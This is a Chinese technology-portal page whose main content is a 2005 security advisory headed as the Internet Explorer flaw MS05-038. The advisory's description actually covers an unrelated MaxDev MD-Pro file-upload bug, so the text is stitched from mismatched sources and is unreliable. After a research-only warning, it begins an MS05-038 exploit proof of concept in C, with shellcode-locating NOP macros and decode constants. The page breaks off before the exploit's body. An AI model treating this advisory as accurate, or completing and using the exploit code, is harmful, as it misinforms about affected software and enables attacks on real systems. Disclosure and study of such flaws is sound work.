+设为首页   +添加到收藏夹
首页·栏目 >  软件资讯  |  技术专题  |  编程技术  |  数据库  |  服务器  |  项目方案  |  网站架构  |  应用指南  |  技术教程  |  项目开发
    当前位置:首页 » 服务器技术
开发技术指南» 文章正文
    引言: 信息提供: 安全公告(或线索)提供热线:51c
 

 

 ·使用linux防火墙    »显示摘要«
    摘要:近来在各项internet的应用已迅速席卷全球之时,「网路安全」的问题也开始引起了大多数人的关切,而基於这个问题而发展出"firewall"(防火墙)如此的产物,利用它来防止外部网路不速之客的入侵。此文要将"firewall"和"linux"做一个结合,介绍各位来架设linux的防火墙。各位linux的老朋友新朋友好久没有在纸上相见,希望能藉这个难得的机会用短短的文章和大家多多分享这敝人的小小心得......
 ·iptables在网络中的两个经典应用    »显示摘要«
    摘要:一.端口转发:在详述端口转发之前,先讲一下我日前遇到的一件事情。本人是搞测试的,有一厂家拿了一个服务器软件叫我测试。基于win2k的,端口号为881,服务器直接连接外部网络,客户端通过服器ip来访问,而他们没有基于linux的服务器软件,照他们意思就必须将服务器换成windows的。作为一个linux爱好者,我想大家明白这种痛苦。我翻了一下资料,发现iptables的端口转发功能可以解决,折腾了一......


Microsoft Internet Explorer Web文件夹行为跨域漏洞(MS05-038)

【程序编程相关:解读防火墙记录

【推荐阅读:教你将Linux配置为代理防火墙

信息提供: 【扩展信息:如何设置一个可靠的防火墙系统保护公司内部

安全公告(或线索)提供热线:51cto.editor@gmail.com

漏洞类别:

远程文件上载漏洞

攻击类型:

远程攻击

发布日期:

2005-08-10

更新日期:

2005-08-12

受影响系统:

microsoft internet explorer 6.0 sp1

microsoft internet explorer 5.0 sp4

microsoft internet explorer 5.5 sp2

- microsoft windows me

microsoft internet explorer 6.0

- microsoft windows xp sp2

- microsoft windows server 2003 sp1

- microsoft windows server 2003

安全系统:

漏洞报告人:

漏洞描述:

bugtraq id: 14750

maxdev md-pro包含有一个任意的远程文件上载漏洞.该漏洞是由于对用户提交申请时输入的信息进行处理失败而导致的.

该漏洞是由于一个软件设计错误导致的.软件中采用黑名单技术来列出那些扩展名文件不能被上载,同时采用了优良名单来规定特定扩展名的文件可以被上载.攻击者可利用该漏洞来上载包含恶意脚本的任意文件,并可能在感染的服务器上执行该脚本.

这最终可导致未被授权的用户顺利地访问web服务器.

测试方法:

警告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.使用者风险自负!

/*+++++++++++++++++++++++++++++++++++++++++++++++

ms05 038 exploit poc

write by zwell

2005 8 11

http://www.donews.net/zwell

zwell@sohu.com

some code belongs to lion(cnhonker), regards to him.

this code tested on windows 2003

-----------------------------------------------*/

#include

#include

#pragma comment(lib, "ws2_32")

// use for find the asm code

#define proc_begin                     __asm _emit 0x90 __asm  _emit 0x90\

__asm _emit 0x90 __asm  _emit 0x90\

__asm _emit 0x90 __asm  _emit 0x90\

__asm _emit 0x90 __asm  _emit 0x90

#define proc_end                       proc_begin

#define search_str                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"

#define search_len                     8

#define max_sc_len                     2048

#define hash_key                       13

// define decode parameter

#define decode_len                     21


...   下一页
 ·linux下的nat及防火墙的混合应用(1)    »显示摘要«
    摘要:linux凭借其稳定性、安全性和代码开放在这几年中,风靡全球;作为一种类unix系统,linux正在互联网的各个层面得到应用,从科学计算到银行取款机,从网络web服务到高层的oracle 数据库应用。都可以看到linux的影子。而由于linux遵循于gpl协议(公共软件许可证),任何人可以得到并且修改它的源代码,所以他的安全性相较于其他的非开源系统来说要高的多;并且它可以从网络中免费下载。从这2点......
» 本期热门文章:

©2000-2007 All Rights Reserved. 最佳浏览:1024X768 MSIE